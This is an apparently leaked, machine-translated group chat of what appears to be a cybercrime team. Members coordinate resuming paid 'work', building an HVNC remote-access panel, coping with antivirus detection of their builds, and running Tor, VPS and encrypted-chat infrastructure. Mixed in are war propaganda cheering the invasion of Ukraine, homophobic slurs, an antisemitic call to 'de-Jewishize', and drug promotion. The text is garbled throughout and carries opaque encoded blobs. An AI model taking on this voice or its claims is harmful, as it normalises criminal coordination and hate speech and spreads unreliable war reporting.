If anyone has any constructive suggestions - write immediately via @. Example @all ²Work is needed today. And the war was yesterday.now need arbaiten )while the main agenda of the war all need a vacation)?if all are ready there is money there is experience how to use it there is an understanding that everything will be profitable so they have already handed over the money and the technicians to cooperate so that it will be possible in the future to each other or exchangedobavit in the toad) if there is a desire to continue working again but there is time money and desire in the technical plan is weak talk as thereThe customers seem to be in place or I do not understand something work stands)? What do you need?
Or something is missing? already there, what is the problem to maintain? and standalone quite> how much time will go to write
> Stylac + HVNC
so HVNC is there.in tg videopostit that he in kiev )it's too early).zelaya game overts not authorized it just today).there will be more convenient to have a colloquy conversations)
added
it's more convenient to have collette conversations there )jameswatson added it as a tool to keep in touch if needed don't use Authenticate + so you'll already have someone to talk to first thing) otherwise it all might turn off anytime you want to do something )so you can connect if needed exchange contacts between you++ I copied the contact just in case later will knock (tester) and zp and further %determined tasks will be set in the near futuredobodavit monkeymadness@thesecure.biz and send me id v ryvkom interesting to try, while the network is still a lot of people. not so easy to disperse us turned out to be a lot of people, and Adam need someone from the administration at least, for further discussion, I think, and how many we have in the work how many months of work done and the panel for the further conduct of the HVNC how much time will go to write Kermit suggested to try to self-organize at least for some time is the new commander in chief?What kind of investment is needed to get started? Isn't it work to talk about mushrooms?there is a meeting like this ! fly agarics...i will feed zelensky with them jokingly but they did not know that there was a mega tree with killer beech mushrooms near them !ahahaha not just chop it up, like a Christmas tree, but fuck it up in a deadly battle! chopped one mushroom, soup for the whole village :D come to think of it, if you had to not pick it up with your hands, but chop it up with an axe))so you have to hunt them, it's not like that, eh)) Yeah. There fly agarics eat people, not the other way around, as you are used to))))) fly agarics is better there )I would go there, the nature is pptsponali in Pripyat)stop sitting in Chernobyl)not always, before you were born was very normalVeldon say a booze god with you, just AIF yellowish babes always had a cockfuck) then what is the unreliability of aif?Oh, I don't give a fuck honestly, do you want a video interview with them or can you find it yourself? Kerya, the AIF has become a reliable source here :sweat_smile:do you have reliable, proven data?
no?
Then sit back and sniff your holes.

When there will be data, I will report, but so far there are no losses, I do not use a source of "one grandmother said "Who has an account amlbot ?conchita :clown: you grew a beard::Dbla, in this chat you can write yourselfvse, sumos ourSaga about Zmeinom. Zelensky "buried" his soldiers and they surrendered
`https://aif.ru/politics/world/saga_o_zmeinom_zelenskiy_pohoronil_svoih_soldat_a_oni_sdalis_v_plen` to salary :joy:bitok at least grows there ozov and some other groups will run with the weapon in the Ua they did everything beautifully, I myself pizdat os bots playnuzhdat more memeponet, themtamnet so it's easier to throw on the secret, there yes, where they got stuck, as they do not do and no one in essence did not do obstacles, they were shooting at kiev, like klitschko did) and a couple hundred casualties, i.e. at least two planes, two helicopters. if they cut their losses it will be clear as two*2 And what losses have the slavic brothers got?to take cities without losses, well-nuhaha, well no losses I want to know the price of this whole story @patrick post losses Volunteers or militia of the dnr again it is not ours, they quit six months ago how!that's fucked up of course, will @elroy come out ?! that's it, Kiev is ours all to restPoroshenko has left Ukraine - a source from his entourage.Closer to the night will swatVSU deployed "Grad" installations in residential areas of Kiev
The Ministry of Defense reported that Grad launchers have been deployed in residential quarters of Kiev, on Shevchenko Square. They are aimed at our grouping of troops in Gostomel. Obviously, the AFU will cover civilians as a human shield.20 minutes ago
Kiev is blockaded from the west side
Russian Defense MinistryRussian spies have been given special orders to try to prevent Alexander Turchinov from fleeing Ukraine. Sources in the Russian Defense Ministry say that he is going to be tried for war crimes and unleashing war in the east of the country.`https://www.youtube.com/watch?v=fIrnhCVVFfY]MPs arrive Troeshchina, Kiev, Russian tank columnVorzel under fire.Shots fired in Kiev near Vozdukhoflotsky avenue.20 minutes ago
Zelensky offered Putin to sit down at the negotiating table to stop the deathsNot for long time the frayer danced it's Malyuta, the friend of the cleaver`https://t.me/botsmanua` he has a channel in the TV, the videos from hunting will be available to watch40 minutes ago
CNN: Vladimir Zelensky was taken to a bunker as Russian troops approach Kiev@biggie hummer is pitiful, idiot gotHead of Rossotrudnichestvo Evgeny Primakov
In February 2003, a few weeks before the start of the American military operation in Iraq (yes, incidentally, not approved by any UN Security Council, but who was that to stop it), Saddam Hussein handed out his AKs to the people.

In principle, there were plenty of guns in all the houses, mostly the bosses' houses. And with all the distrust of his own people (I remember in pre-war Baghdad they cancelled a pro-government demonstration and put machine gunners on the rooftops when they held a small Interior Ministry parade), Saddam decided to arm literally everyone in the city. "Every window in our houses would be turned into a firing point!" - propaganda broadcast.

And when the Americans entered the city, it turned out that all these weapons had been disassembled in order to fight off looters or, on the contrary, to loot. A little later, all these guns went underground and are still being used to fight in Iraq and Syria.

In July 2011, a month before the fall of the capital, Muammar Gaddafi, fascinated by the mass demonstrations in his support in Tripoli's Green Square, decided to arm Libyans by handing them Kalashas. Then the Americans (leading from behind) led a coalition that bombed peace and democracy into Libya (the Security Council had then agreed to a no-fly zone, but that was a bad start - it did not limit regime change in any way). Muammar Gaddafi believed that the armed people would stand up to defend the gains of the "green revolution. And when Tripoli fell in August, all these weapons were used either to loot or to defend themselves against looting. And they are still firing.

When Zelensky decided to distribute 10 thousand kalashnikovs to Kiev citizens, I don't want to compare him with Saddam or Gaddafi or compare us with the Americans - those had completely different reasons and logic: to attack other countries and start wars, while we only stop wars. I'm curious about something else: will 10 thousand Kalashnikovs actually help Zelensky's gop-company to "defend Kiev" (no, they won't) or will they be used according to an established tradition to settle an old score with their neighbors and go to the nearest jewelry store?

I suspect that the gop-company may understand this very well. But they don't care so much what happens to Ukraine after they're sent to the denazification tribunal that "burn the barn, burn the hut.

The Ukrainian government has been trying to make the most of it, but it has not been able to do anything about it, and it has not been able to do anything about it, and it has not been able to do anything about it. The AFU itself shot down a missile over residential areas in Kiev

It gets more and more interesting with this morning's incident in Kiev, when the local air defense forces shot down a missile right over residential buildings for some reason. As CNN found out, the missile was mistakenly launched by Ukrainian troops at their own fighter jet, which presumably went down in another area on the outskirts of Kiev.

An hour later, Ukrainian President Zelensky published an appeal in which he told citizens that Russians were bombing Ukrainian cities. He called for mercilessly fighting the occupiers and destroying them.

There are now crowds of people at the train station in Kiev - they are not allowed to take the train from the capital to Lviv.
According to local publications, those wishing to leave cannot leave, police are pushing them back and people are forced to return to the subway. For what reasons - is not yet reported.
The police have been waiting for eight years and we fucked up Ukraine when they made a revolution there, and now we're chopping and splintering the wood, so don't sit there dry and go to the front yourself and confuse me about the war.There's a whole gang of them - Dud, Meladze, Lazarev, Morgenstern and others demanding a war with Ukraine!
Yekaterina Mizulina has sent statements to the Prosecutor General's Office and the Ministry of Justice to check Yuri Duday for foreign financing. If the verification is confirmed, she calls for the journalist to be recognized as "a person performing the functions of a foreign agent on the territory of Russia".

pummel the faggots! kiev in pinches, the government quarter is being stormed this is gostomel, 5 km to kiev, 4 hours ago4 hours ago
stoltenberg's henhouse reports

Ukrainian Deputy Defense Minister Anna Malyar, referring to the hour-old video, reported that Russian troops have entered the borders of Kiev, according to her, they are heading for the capital.5 hours ago
In Melitopol Russian special forces entered the SBU building - shots can be heard I felt@biggie you knew! he hacks cameras in Ukraine)Man, where do you get your information! :)Victory Avenue nashkreshchatik our God save the tsar and the exporters !You are for me for odessa n331fuck the juntaSirens on Podol, center of Kiev.Chernigov under siegeAssociated Press reports that gunfire is heard in the government quarter of Kiev.the cockerel, he's still going to buy the riot pug on the streams toldBucha, a suburb of kiev, ours)Zhitomir ours I wonder how the Finns feel now )now Patrick will tell us when he's done with the banders - I have a lot of rifles now they do not have it hahaha can they let them live in their country?The Taliban call for a peaceful solution to the conflict in Ukraine.
What's the matter, Patrick, if a person doesn't agree with you he should just go to the wall?) Both grandfather and grandmother, they had no choice! The NKVD had no choice! They should have killed their own people, they should have, I will tell Grandpa when I see him happy Holidays :beers:Worse than tekaklenin and stalin the murderer stalin was right and stalin was right, so I see, navalnists should be shot on sight, in my heart the Spanish conquistador died and the tartar rose again:laughing:Stalin the GeorgianLenin also Jesus the Jew See, son, says Jesus, that man over there, he killed your parents and you, go and embrace him, now you will all live together in my kingdom Neanderthals would be aa WITHOUT negroes there would be no Ukraine and today's war without Kievan Rus without Comunia* "All irritation and rage and anger and yelling and rancor with all malice shall be removed from you; But be kind and compassionate to one another, forgiving one another, as God in Christ has forgiven you. What's up with the clowns? @biggie the good, i.e. the ussr, had nothing to make it out of but evil, i.e. the russian empire. We'll all cut each other up on this planet soon, so we need a military operation in israel to de-Jewishize@jesus!We need Jesus, only he will judge and tell the truth, who God is for! Fuck, I am already confused who is for what and why! The Soviet factories were built by Americans and Europeans with the hands of our comrades. The empire was ruined by the Jews with England's money. It's only fair that the Soviets should answer for the collapse of the Russian empire, and everyone, including the pindostan, should answer for the destruction of my homeland - the USSR...." would have looked a bit more scrupulousGeorgia will not join the sanctions against Russia.starobelsk nashkievskaya obolny naschane, viskarik naschane, I look satiated painfully and storming kievaty hungry shtole?I look at the price tag in the store and I start to rejoice, my soul sings when they reach into my pocket and others clap their hands - thank you! I always forget that we are all exporters! All 140 million people! I'm so happy about this. What for?
Russian exporters are so happy, why should they get in the way? Tell me when the dollar is 35 Melitopol our Konotop and Sumylov in the ringWhen Elroy comes, poke me with a wand... I have been taking terminators/cyborgs to organs since I drank in the morning, all day free (s)I have a pact with himWeldon, bro, you'd better quit with them snake-ass grease your vagelin, I'm not Putin)and I remember that they were good at tearing in half, were dense and you could collect animal shit. I recommend it, I've seen punched cards in the research institute, should you open a sex shop? I've seen punched cards, and that at the university, because our VC often still used punched cards) I punched cards to clean shit!And the basics on themKasets, too, I remember the tapes I saw the first UFOUltima Online )UO? also say you know played in UOI am very old)I know what is irc) correct the mistake:
In the word KuevNe. Pity. yes kherson with itAnd no one knows what irc.In irc ru_books moderator for politics put pluses. If you're a clown, you can get trampers every day, we're free people):rofl:And when are the atheists?(Oh, we have shuttlecocksgood thing I'm not from this planetgood thing I'm an atheist Catholics celebrate by the Gregorian calendar and the Orthodox by the Julian, so the difference in two weeks now I understand) is like the seventh, but the twenty-fourth What is that?happy catholic christmas, by the waytx mate!:vulcan:youtara, on psi+ standsbad morozbad santa :santa:KOT they also spell hooho maser fakerPaschalk just double-checkedwhere did you see this santa?)and bots fighting today also wearing a santa hat?))@elroy hello, I have an old toad without hats and dyed eggs)On vlc also have.Oh these Easterlayer, by the way yesterday it was on my vls playerMaybe EasterlayerI also see.yesGood morning everyone))
Say, one I see a Santa hat on the psi + star in the tray? @angelo do not want ADATA or Samsung (I have incidentally 3 SSDs: 2 Adata and 1 Samsung + external Kingston) - take OMICRON - he has the future :grinning:@lawerence knock manuel will tell who crypto bk ?git soon will riseNew poem about "the little boy":
https://siasky.net/LAACqddmKm3hW_S0ESz9Htw3SAflYbNjMDtPVsmcrx8GmQ@adam The main git lies. Pick it up please.
https://0xthreatintel.medium.com/internals-of-ta428-operation-lagtime-it-3fd342404360
```
mbe somebody would be interested Or dlsym, but not the point> i remember on ks servers there was some kind of exploit, you send a packet and the server goes down

Yes there is just a problem with linux servers related to the implementation of dlopen
There's a command for spawning monsters and it looks for a symbol in a server module with the entity name of the desired monster and calls it as a function.
And dlopen looks for symbols in all loaded modules including libc.
You can printf on the server to call and shit in the console. a little) olskuli not changed? I teared upwww, pluginsI at one time from amxx cleaned this crap so they did not)) and again you play on dalt2If you see such ports in the cake, then try to put a new browser or put in a nearby folder Expert boundle and connect again. You know, the problem is solved instantly. They like somehow learned to damage the chainprikolno was, the map is not picked, took took put nahrennyu at servaki ks what an exploit was, you send a package and servak falls downA here on the torus by the way it is interesting. Noticed when the addresses in the ports are taken like 27015, 27020, there is no connection, always an error to them. It's probably fun schoolboys, KC servers poke fun)). The problem is somewhere in the torus.
Details: 0xF0 - requested onion-resource descriptor not found in hash. Service is not available for the client.Can't complete SOCKS5 connection thenA git does not work;Hello all.@frances :thumbsup:Hello all.@all Hello friends! I noticed recently a sad tendency in some of our colleagues - to appear only for the WP. So here goes. Your next WP depends on my good mood and your online. If I write to someone and do not get a reply within 3 hours during working hours - I put myself a note. Two notes and we say goodbye. Raziebatyami no place here, do not want to work and move with the team in the same direction - GOOD EVERYTHING. Who if something that he does not like and what he does not agree with - leave it in person. Have a good working week everyone! - Do you see a gopher?
- No...
- but he is)> fuck, it's boring without sylver. he was a good politician
boring......> but what about giving the pindos a blowjob?
So read between the lines, you can see everything there) they have a tasty stew with their parents, if you're going to Chen, stock up on stew, just in case it's good that you're not Starshina Don't piss, next to me is Elder, 3 years with you I feel like an old man, I envy your potency:laughing:just what you need on a "man's" holidayoo, homosexuality has arrivedif you want to be ok, fuck the Baiden, every day:thinking:fuck, boring without a sylver. good politician was you want peace prepare for war but how do you give the pindos a blow job? Happy Holidays, colleagues! To all who are involved and not.
But to all of us, peace. Let the bots fight, we have more power over them)): Happy Holidays, cyber troops! Happy holidays, everybody! Happy holidays[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/announcements?msg=qirRkPrwM7yXyE5Xp) Really cool stuff, sorry I don't have a windup. Watch the Berkova fight. Who's Bruce gonna teach her the nunchucks?what straight Mortol Kombatnu needed then Buzova with nunchakammejljet belt renvnuzhna fight datsik with aliens from nibirua renvnuzhna top vendor treshchavleny treshrentv sure that the promotion + hryunov orda there judge conchdatsik surrendered exactly chokovoy?iwho was watching the fight 😃troll them, they went to pieces of coursenod32 demolishes everything compiled under 32bit studio 2019Reporteddefender muitorrent demolishesgoodnight bro:relieved: everybody have a good weekend!good night =)good night guys all, Kera don't fuck with the monitor, fuck with a woman you should buy lsd and sit on a microdosing there is a red, there is panternyPanterny - a more brutal version black fly - what is it? I'm not Kera, I will not google our young naturalist what is it?I never doubted myself I never doubted you I know :smiling_imp:you're a fuckin' idiot good at 16 and a lad like that at 16aubene, you can't get any younger than 17Now I really tried microdosing on myself - the subject is normal. More batch ordered, including panthernogolstaet social network likeeechild pornography what is it? By the way, about fly agaric `https://siasky.net/BACSctoC-D9TRrvegFxE3qbtY3njsBC6Mb995zDaN0vUAQ` look? look at the bitches 18ih And pornohutam girls are good yeah i just tiktok to sleep fuckin' rent-tv site i will go when he alone remains on the whole runetenu fuck, Tinkov because ren tv has a site> i do not watch TV with
Fuck, you're not like everyone else2010 after my link everyone went to try I guess I don't watch tv or any other trashakdatsiks who watch fights on ren tv? don't remember who wrote that if men learned to suck themselves, then women were not needed But I really wondered if you have a fuckin' reference book there
https://www.intimshop.ru/sex-faq/masturbaciya/kak_otsosat_sebe_soveti_po_vip.html
I'd like to smoke an Indian peace pipe, they say it's a good stuff. I like adrenaline better, it's good for the nerves too. I'm for cannabis, I ain't never seen no fights on kumar. Misha's reel for booze - no hangover in the morning. After it, there's not as much aggression as what you said... It's better to get off your chest or join the Communist Party if you're prone to schizophrenia, you might end up in a mental hospital. Everything is relative. Cannabis is supposedly useful, they say, it presses cockroaches in your head and you'll fuck up, say Chelyabinsk cops. I'm coming back once in the evening..,
I'm high on hash.
Life is beautiful.
And insanely good.The worst thing that can happen is to get our correspondence to the krebsuble, the cord knew how to do bullshitKatuha Mishin from all sorts of diseases, fly agaric from nevras, sodium thiosulfate - from if modeling climate grab where the fuck, I looked at this Epifantsev, fuck your fly agaric.
https://www.youtube.com/watch?v=p8H73LJDClc
What if the cuckoo had gone away ?
I wouldn't feel any side effects - I just don't give a fuck all of a sudden a bungee jump would calm me down What if the cuckoo were gone? Am I sober? I'm not pissed. I tried it - the cuckoo really calmed down. Everybody eats it and sells it dry. By the way, why are they all hooked on fly agarics in Ru?It's a pitta glass Why are they all drunk? cancer is cancer, not cancer, cancer with his money Jobs also has a lot to say and all the talk is about whores, thrash and drugs) love it and here come the drugs again and hello! i like drugs again...go on a microdosing of amphitamine salts, cyber athletes do it for a reason. i know a lady i know, she's curing her cancer with fly agaric mushrooms... she seems to be successful.no they would have pulled the ms for monopolies or what ker and you sleep at all ? de'bill g(x)atesstiv uyobsi in eugenics gates is not yet he is dead already and steve jobes threw his buddies for 500 bucks will not open a bottle of beer with his eyes ?he's not fed up with the wind? he didn't grow up in chelyabinsk? so what's his beef? he's a sly glasses-eyed mother's boy, not a computer genius. at least he's not bullshitting that he's a citizen and he didn't rent tic-tac-toe that he had money? he was the son of rich parents, and he didn't even write DOS, he bought it from someone.
what's the charge? i was thinking about her ! there is a connection )) yes i see it )you can connect mr. s with american insurance companies, not with dithyrambs, but with the fact that billy is a rich man's son, and he didn't even write the DOS, he bought it from someone, and they really connect some random events I like your brevity ) i am fucked if people have time for it i could drink a beer with you :D it's Kehr's favorite topic )fuckin' dithyrambs there, but also about gates connection with the Rockefellers, about eugenics and wanting to put everyone under control, even crazier is the idea of not chipping, eugenicsaaaa, I did not watch that, but I condemn it lolroll about chipping or what?Why Ker ?who essentially lobbied for his interests in the business community, well you're nuts of course and not a word about the parents again@Ruben and what is there to watch ? the link to the page @kermit tell me exactly why it's not a question of dispute), there was a "request" to wrap all the links in tags ...and why should I wrap them in quotes?Why do I put it in quotes? so it won't be highlighted? Ruben put the link in quotes. "D. Corbett - A success story or the crown of windows for everyone" -- about bill gates: https://siasky.net/CADtRTm-lZhGqrh06bI-kruFsxz7gHbgw9IPodqTcRQeaA where are your long-winded dialogues, that's better than the May sun to me! that's it?! and you all have a nice weekend) pongpingposting a few hours ~ one hour@demetrius write a question
there and backthere's a good mornin instead of hercules for the morning drugging ?and slam the door correctly answer, like "both" =) yep think about what I've lived to: Belladonna's son Took me off with his "good morning" as if I was a button monger!I didn't really add it =)or maybe you want to say good morning to everyone =))) - What do you mean by that? Just wish me a good morning? Or are you saying that it's a good morning - no matter what I think about it? Or do you mean that everyone should be good this morning?ъъфeyJhbGciOiJBytfpuz5M6OkBnz5AGj/ku3HL4eurD2nioCPKiv5CwevAnSwqDfxGNXU9o/7ekSpAaRI1I7h2rtoIGQBrh+sUpm8CRv9D7gtoGyZK1e5g73Wuu9Wp1nBhMfMNFQdhrA4/PdMBVPKBjJAmPJkucZWiVislo8KAZmPnFaKrxgSpKzoDBj53c82uDeY/HzRQw2BOFr1LYdiRKFafdwBeJlA3Hg=={"$binary":"oCcyG/sJV19p12GumbNPNywhBaBsIlMkJo+KkKTJwAZfhwA6jrr5o0LX8qMR+cJq6ErvGayO9WOpsJ3tS2vP+Xt4U6HuP52iX2+sRsoIrSpriEpCJn96J5O1jwC0AFVd8HrRnCP2FO6QjB52dULOhASQw3+7EBfIxEVgyLG/zx/S//XeASI73pfg6QRAf2P7l40OJiXpLgEAQ8qAiAK1npblM/PtWlnpnbBjN8k="}{"$binary":"gdW832rygeGS8LWSmoMn3LKnbtHVzGUvJDWtYMqjgOkGWGQ+YUsE5OQ9A5j4flnuBk8KM22zgZQ82YbidiWtHwz5IDdAQyzx9Cs/uYdjmCEGF4tF1P02INC2lT1oVBOrs1OMwFUdjfzqma05X48aFdrROC1QciIxWs14uxcA3yqfrSCUeJ4ssm9Y/zVp/KBU/mpGoOUtcrO2ymQxB3TPHdgikLGbZwlthr19VNIriwEys3YK+Wb2+GfXuz0Jnz6jfBi7RZuUI932dUPVCNEeQUtgWzt1X5IeUtpm/dFc7ZMaasojh9NrJRkmn/LFRLXYmew879lU9QBB3o6vh+UuEWAdJsvw8hObx3G8JLwLGSVUARsNQlYDp+SY9fVFaHBskVmEknJuTL1MMhF5qXhCRX9i+fFEd7GZD+wXLKYwAnklklM2bwL6JxR9noFikz9BM1b2zH0zaPUBWOR9pXJSsDmu3H8XFC2R4F0jxvQtAbsHzq3q2dprPL3JiegnJTHVpQmCC+9AzreWJN0zo/H8NTc/mK9kSBCD9oadm3dm+EhZC1Mk0UkWRc0aCdcY0Ab7pK+Dj/7ZGQhQfKk66wHq6shAQmFlP4RE0L0sgtG8ZrivSFgOjbX7fuyoQIe0kuUPnWvLI5pZQSyvyzgAdm2YO38oZgD19zJ2bFj+nys+n8pFraFameQOE0IKlEUUhN0N6EUF/5vAEvSITq4q8dsqtByuqMlnPX29GDQb/hSQ9tHFnN3XglRluskm8Fte3CjzJYgahNGIA2Uwy/9dUvqYTSBd0JHcE6XoDMd+2B0tomPkzzv+gtAa4k+FMgjBLIg6/uvbdVoPUszOeCLlIab47eoeEANj7PzmZCrvEtIYIc0zAAYbUYACiPgXjNc21raWGX1JCj5E5w=="}{"$binary":"WJL1DeJ1h+JeIbdqj4eJdytTwuuIOCiqxJHRU4uYHtrM0o/wR0dJIvLquoitPA/5/P9CHFOF7u3soXuK6R+Yl6p1W3QS0fJ7z0EovsNDnSUxqRWnZ1q0rnkPVWYCyYHACBtMvp3lsIqGvh1ag/zL0FW7XCGbK6D0SyrR3XTTEbGr3s1IT/dmG9z6CS5mkvrnfKB/3+YcD1nYI0PzcMaSTG+9sK6Io+8Ji+qlMoP8IR36IQ=="}щас I used it to check the sijumars -- It's working, I got it) my web site won't opengit, I mean.I just pulled, pushed - everything is fine. @all does anyone here have a poppy? no one has had problems with updates of the os? and the torus rakes up the zbs, then the error 502@thomas somehow through the ragit works for anyone? @rubenmars at the input seems to have diedBitch meBoys, and who AV farm maintains? AV updates, etc. Need advice)
Roskom screws up the connection...You can try to wrap a tor browser through a tor, indicating the bridge in your browser. I tried different bridges, it didn't help. On my tablet and my phone, same thing. All of a sudden, I'm connected. Hi.)
So what wasn't working? Browser doesn't connect? git from the command line - works.I wanted to commit to git already with a comment like 'sos'.Hi. I've got git working :vulcan:git sometimes glitches write git to adamperl Hi there,is git working for you?:metal:good morninghoroshofrans is waiting for the bossI'm out of vps and bitsGive me 10 vps pleaseHiThis is from another cult)and your crypto kosh will be filled to the brim with bits and bytes of your ssdsh !from bugs and lag, admins crashes and tora tupeniya, amen:D░░░░░░░░░░░▄▀▀▀▀▀▀▄░░░░░░░░░░
░░░░░░░░░░░░▀▀▀▀▀▀░░░░░░░░░░░
░░░░░░░░░░░░▄""""▄░░░░░░░░░░░
░░░░░▄"""░░░""""""░░▄"""▄░░░░
░░░▄""""""░░░▀▀▀▀░░░""""""▄░░
░░▄""""▀▄"""""""""""▄▀"""""▄░
░░"""""▄""""""""""""""░"""""░
░""""""░""░""""""""░""░"""""▄
░""""""░""░""""""""░""░"""""
▄""""""░""░""""""""░""░"""""
"""""""░""░""""""""░""░"""""
"""""""░""░""""""""░""░"""""
""""""░░░░░"""▀▀"""░░░░▀▀"""
""""░░░░░░░"""░░"""░░░░░░"""
"""▀░░░░░░░"""░░"""░░░░░░▀""
▀"░░░░░░░░░"""░░"""░░░░░░░░"▀
░░░░░░░░░░░"""░░"""░░░░░░░░░░
░░░░░░░░░░░"""░░"""░░░░░░░░░░
░░░░░░░░░░░"""░░"""░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░╔╗║║╔═╦╠╗░░░╔╗║║╔╔═╔╗╠╗░░
░░░░║║╚╣║░║║║░░░╠╣╠╣║╠═║║║║░░
░░░░║║═╝╚═║╚╝░░░║║║║║╚═╝║╚╝░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░╦╔═╔═╔╗░░░╗╔╔╗╔╗║║║║╦░░░░
░░░░║╠═╠╗╚╣░░░╠╣║║╠╣╠╣║║║░░░░
░░░░║╚═╚╝╔╣░░░╝╚╠╝║║║║╚╝║░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ our angel is not like that - he will not spoil girls for oriflam) I do not know you, but I will shave you. 0_0t's the one I wanted to put on "puking farther than I see,
I piss farther than I hear, am I not an ANGEL? 😇")Anyway, if you've seen "Perfumer", there's a scene before the trial when they take Grenouille out and the priest shouts "that's an angel" and then the orgy starts There's an alternative web-mode to YouTube without ads and with a "download video" button - openyoutube.net
there's no less trackers there, it's better not to, or else he'll get angry (well, I doubt it, you can remake "steamed lightly") for a link to sylver will not kick you in the pants? actually, with me is very funny :rolling_eyes:koolstory in the style of Jean Paul Gaultier)throwing up further than I can see,
i piss farther than i hear - am i not an angel????:innocent:i'm trying to remember the most harmless ones =))aahahahaha )) i even pissed on the policeman, remember - remember the waiter threw up caviar once.and almost always for every shame, ng + booze = history in the life of the story you just did not fall asleep in the car with him, he would not have cared about your color) nooo, we were blue, but not blue, so the four of us cabbies spielly-wielly:grin:I'm ashamed also at first thought: "with a client, or "I thought it would be different ) You have not had sex this year? Seychaz will do it :Dblin))) @angelo I remembered a student's story, New Year's Eve, about 20 years ago)
i celebrated the nouveau at a classmate's place, got drunk, took a taxi, and went to see the girls,
the cab driver was, wow!, a Georgian or an Armenian.
asks us;
- Which one of you had sex in this shit???
we don't say a word, we can't catch up... he..:
- I've had sex this New Year! WAH!
we laughed like we were stoned with a weighty gas):grinning:love story from Tallinn-it's a fucked-up story in general)))) what a sad anecdote (Two estonians are talking:
- Well, it's New Year's Eve soon, it's a good holiday!
- Yes, it's good, it's almost like sex!
- Yes, but still sex is better!
- I've had such a guy in my life, he won't even remind me how you pissed on the policeman at 16. It's better not to drink with him, he won't forget anything - he'll remember it all his life later on.Like ElectronicsHammer is right on his word, but it was a long time ago and it's not true, so you have to clarify again. those agree on how to work the main message - those who work on active projects, they work till the 10th in vacationSilver wrote, but what exactly need to clarify by the way bosses did not say how we rest?@jaime - Blue Water Tiger - symbol of 2022 (Blue is considered one of the most fickle colors in the East, which means we need to be ready for changes))))))@angelo *_not have 100 friends... but have all enemies_* :rofl:=)Weldon is trying to find a friend And tigers, too? :(And what is blue? @angelo and you send valentines in advance?) Do not worry, you will not miss it! Well, the year of the *blue tiger * has yet come:grin:@rocco take for repairs from us)
 "▀▀▀▀▀▀▀▀▀
▌░▄""▄""▄░ ▌
▌░"""""""░ ▌
▌░░▀"""▀░░ ▌
▌░░░░▀░░░░ ▌
"▄▄▄▄▄▄▄▄▄ I thought they blocked something We owe it to you...let's stay!!! Praise the great Fixer !on the server glitched all fixedBrothers, how is your rocket behaving?@all who did not get the WP - report in personHi, I will connect late today, 16:00 мскeyJhbGciOiJBvt2V1sDmhz8+L+yPmfdBKUWawNPbcMQkrs84mxiSQRzhItdE0VBim3T2dl5tUknnh/RkjX0YXTCh1a/VHt5Wi058faPGE/xiU3x/Ms+USLrLeJJReQ3bgrk4P9uGx44/cpqH8cRL/e6m/tfUp6ifwav7M+dslgEKLcFt4et4aZm6yMOV60KojF5yubxqcdfDeyJhbGciOiJBTm9xvN70228roW/f791x6t83JZKl4D7MjL3QlVXsp76BKEZZbJvWfe10YInSytbMKApupkR1/K5P9vPv2jrKcCkwp4o3yjXY3U+O0LffWZTlzehebAq3iVKAFyjzgnDXBcDHHiV2/Fb6bAdQW6bn6YfWkEBQDk1yRVQvZomZt2b5hX1C6azVgA8bTm52CpH/VaSGW3U+X3D+28xfu43Sj3R98iQYaYM07cPqdke9JoBHOEuouQmNp1gMy8gsTfOHCUD2XjkExGlEZKRLZs0+Rf797xgjsDHiwYrLf4gIPDSaqiVzVkTQoiTCjPRoFOdI8QSfUSFjiHyZ9qa3S1nkjq26y5BD31gYzo/BU4auvnGEuUtzbtZnH+XVElMuC0jr/IIs2EQLD8LIJ2UADPY/zEmBYoLcZgiROkzQjQ8Dq10kEipVsGwKUf29PT7+7IiPMPEMM24nfaF7zfbnKsyT8xw/cDW1mBJvuW+jxOebxX448r4A8MvZWefbNeGmMd0+IooyCGGQYolX3I3ng07l6Bi9brAf8j9OVk//jTvyiQhSZ4qDvi6hKkRxZmGV1ENf2B5vglvH9pFVLiTWsry+5g==eyJhbGciOiJBdMefvqcHMBKknw8CmPVO58YZPzkrxRPx22wP9Hh7h741e0OKm0UV1n0eTqRqqRF8awX9lqwrmP4aAu4h/2RFUZ9TN/r39RB3SdkyqlCiOkM6Xr+JKTS6Hpknoh4YJwUZTX6MRbcFgqNdUKyZQqxa/WkXluxDCZMPRpgB+n79kvE=eyJhbGciOiJBtTze9S they got it twisted there, you wouldn't understand it`http://securitylab.ru/news/529632.php`)maybe a screenshot ?</> ``quotes at the bottom``https://www.finanz.ru/novosti/valyuty/vladelcev-kriptovalyut-otsledyat-i-zastavyat-zaplatit-trillion-1031172650` is it how? in tags, please! https://www.finanz.I also like PZH very much, I'll ask to add it to the protocolIt would be nice to return the settingIn previous versions of rocketchat before the update it was not necessary to confirm the interlocutor, and now it would be necessary to raise it...The OTR is not an encryption of the online session, it's the rocketchat account that catches the connection, it may not be visible to the eye + change of IP to happen timeout is if the interlocutor does not have time to confirm the start of a personal conversation OTR timeout often gives + otr often breaks by timeout when you try to connect da it's a pity. otherwise we could have burned the conspiracy theory and the mysterious insiderrepeley Shura, drink!!! But I'll try to finish autoconnection OTP just had a chat with @demetrius e2e - all encrypted, it means there was a bug, God bless America I love power, I love the FSB sleepy Joe reads Don't panic, everything is normal, just easier to read by SBU and FSB.@benny can you show me an example of an open message? I do not panic, but ask colleagues to conduct an experiment in my place...@rocco @demetrius colleagues urgently need to return the automatic confirmation of the inclusion of OTR in this rocket if so it's bad very((without negativity always thought that fans of e2e is not quite adequate)) well zbsdaa otr normal vorkat? bug or a bug..with enabled e2e encryption in ls
 `This room's encryption has been enabled by benny`
I don't understand `test test test` I was surprised at this shit:
 `This room's encryption has been enabled by benny `that e2e doesn't work what's the question? 2 absolutely different techniquenu clearly, that either e2e, or otrego do not need to turn on when you need otrya above described trabble from the LS when you turn on e2e your assholes krojuvot see, in General pussy and tits and ads in the LS work correctly, you need to turn it off when e2e otre does not ploughelo, in this channel, in @general is plain text - plain text can it some lag, so asked you to check yourself ....! would not be superfluous! and i'm saying that only enabled OTR - shows
